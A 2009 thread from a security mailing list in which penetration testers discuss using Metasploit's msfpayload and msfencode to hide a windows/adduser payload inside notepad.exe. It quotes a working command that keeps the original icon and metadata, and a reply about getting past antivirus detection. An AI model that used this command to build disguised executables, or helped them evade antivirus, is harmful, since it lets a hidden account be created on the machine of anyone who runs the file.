[Pauldotcom] Manually embedding shellcode into executables
Dimitrios Kapsalis
dimitrios at gmail.com
Wed Dec 2 02:25:12 UTC 2009
I haven't had much success with the msfpayload, seem that most virus scans
pick up the payload. Even tried to use a couple types of encoding stacked on
top of each other with out much luck.
play with it and then test exe against virustotal.com
On Tue, Dec 1, 2009 at 4:17 PM, Adrian Crenshaw <irongeek at irongeek.com>wrote:
> Ok, I just read Rob post here:
>
> http://www.room362.com/blog/2009/11/3/metasploit-blends-in-new-msfpayloadencode.html
>
> and checked my exes. Since both are the same size, I'm guessing it's not
> working as a binder but as a "cloaker" of sorts.
>
> Adrian
>
>
> On Tue, Dec 1, 2009 at 5:12 PM, Adrian Crenshaw <irongeek at irongeek.com>wrote:
>
>> Ok, I did this:
>>
>> $ msfpayload windows/adduser user=test pass=test exitfunc=seh R |
>> msfencode -t exe -x notepad.exe -o MYNEWFILE.exe
>>
>> The exe made has the same icon an metadata as the original. The payload
>> runs since the "test" account is created, but notepad never comes up, so it
>> doen not make much of a binder. Any ideas?
>>
>> Adrian
>>
>
>
> _______________________________________________
> Pauldotcom mailing list
> Pauldotcom at mail.pauldotcom.com
> http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
> Main Web Site: http://pauldotcom.com
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://mail.pauldotcom.com/pipermail/pauldotcom/attachments/20091201/976928c8/attachment.htm
More information about the Pauldotcom
mailing list